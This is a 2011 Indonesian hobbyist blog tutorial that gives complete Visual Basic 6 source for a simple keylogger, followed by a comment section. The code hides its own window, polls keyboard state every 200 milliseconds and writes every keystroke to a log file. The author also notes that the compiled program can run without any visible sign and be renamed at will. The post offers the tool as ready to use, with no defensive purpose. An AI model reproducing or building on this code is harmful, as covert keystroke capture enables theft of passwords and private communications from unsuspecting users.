Subscribe:

Rabu, 21 Desember 2011

Cara membuat Keylogger sederhana dengan VB6

Hey...... sobat blogger dah lama neh saya gak update  kemarin lusa ada teman saya yang bertanya "gimana sih cara bikin keylogger" lalu saya berpikir keesokan harinya saya mengudek-ngudek paman Google akhirnya ketemu juga jawabannya ,Nah pada kesempatan ini saya akan memberikan artikel tentang cara membuat keylogger ,artikel ini memang sudah ditunggu- tunggu meskipun sudah banyak yang memposting tentang cara ini oke udah ya curhatnya ,sekarang ikuti saya


pertama sediakan visualbasic6 kalo sobat gakpunya bisa di download
kedua buka visual basic nya pilih yang standard EXE

buat form
name :form1

buat textbox
seting:name:text1
         multiline:true

buat satu timer
seting:interval : 200

lalu copy code berikut ini di form1
(caranya dengan klik kanan pada form pilih viewcode)


Ini Source Codenya


Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer


Private Type TList

kode As Integer

bawah As String

atas As String

End Type


Private List(1 To 255) As TList

Private IndexList As Integer


Private Sub AddToTable(kode As Integer, atas As String, bawah As String)

IndexList = IndexList + 1

List(IndexList).kode = kode

List(IndexList).atas = atas

List(IndexList).bawah = bawah

End Sub


Private Sub Build_Table()

Dim i As Integer

For i = 65 To 90

AddToTable i, Chr(i), Chr(i + 32)

Next i

AddToTable 48, ")", "0"

AddToTable 49, "!", "1"

AddToTable 50, "@", "2"

AddToTable 51, "#", "3"

AddToTable 52, "$", "4"

AddToTable 53, "%", "5"

AddToTable 54, "^", "6"

AddToTable 55, "&", "7"

AddToTable 56, "*", "8"

AddToTable 57, "(", "9"

AddToTable &H60, "", "0"

AddToTable &H61, "", "1"

AddToTable &H62, "", "2"

AddToTable &H63, "", "3"

AddToTable &H64, "", "4"

AddToTable &H65, "", "5"

AddToTable &H66, "", "6"

AddToTable &H67, "", "7"

AddToTable &H68, "", "8"

AddToTable &H69, "", "9"

AddToTable Asc(" "), " ", " "



End Sub


Private Sub Form_Load()

Me.Visible = False

Build_Table

End Sub


Private Sub AddToFile(Isi As String)

Dim Data As String

Dim FileHandler As Long



If (Dir(App.Path & "\log.txt") <> "") Then

FileHandler = FreeFile

Open App.Path & "\log.txt" For Input As #FileHandler

Data = Input(LOF(FileHandler) - 2, #FileHandler)

Close #FileHandler

End If



FileHandler = FreeFile

Open App.Path & "\log.txt" For Output As #FileHandler

Print #FileHandler, Data & Isi

Close #FileHandler

End Sub


Private Sub Timer1_Timer()

Dim i As Integer

Dim a, b As Integer

For i = LBound(List) To UBound(List)

a = GetAsyncKeyState(List(i).kode)

b = GetAsyncKeyState(16)

If (a = -32767) Then

If (b = -32768) Then

AddToFile List(i).atas

Else

AddToFile List(i).bawah

End If

Exit For

End If

Next

End Sub


keterangan kalimat log.txt bisa anda ganti dengan format file apa saja
log.txt :hasil rekaman (log) ketukan keyboard

setelah sudah dicopy pilih menu file>makeproject1.exe
ex: namai dengan klog.exe atau anda bisa namai dengan apa yang anda inginkan
setelah sudah jadi klog.exe ,jalankan file tsb (ketika file sudah dijalankan tidak akan ada reaksi apa-apa jika anda ingin tau apakah file tsb berjalan atau tidak cek di taks manager>proses>cari program yang bernama klog.exe )
jika ada program tsb di taks manger berarti berhasil berjalan

pesan saya  jika terjadi eror pada SC diatas anda bisa coment 

sekian  artikel yang saya buat ini  jika bahasa tulisan di artikel ini kurang bisa anda memahaminya ,harap dimaklumi saja karna saya hanya Newbie yang masih dalam peroses belajar.

maaf saya tidak kasih screensootnya 


Selamat mencoba dan semoga berhasil
Anda suka dengan artikel yang saya buat , anda tak perlu segan untuk mencopynya tetapi saya mohon cantumkan link sumber dari artikel tersebut

0 komentar:

:10 :11 :12 :13
:14 :15 :16 :17
:18 :19 :20 :21
:22 :23 :24 :25
:26 :27 :28 :29
:30 :31 :32 :33
:34 :35 :36 :37
:38 :39 :40 :41
:42 :43 :44 :45
:46 :47 :48 :49
:50 :51 :52 :53
:55 :56 :57
:58 :)) :)] ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} ~x( :-t b-( :-L x( =))

Posting Komentar

Luangkan sedikit komentar untuk masukan blog saya anda bisa berkomentar dengan emoticon dengan menggunakan kode diatas sesuai dengan emotionnya , ingat...!! berkomentar lah dengan bijak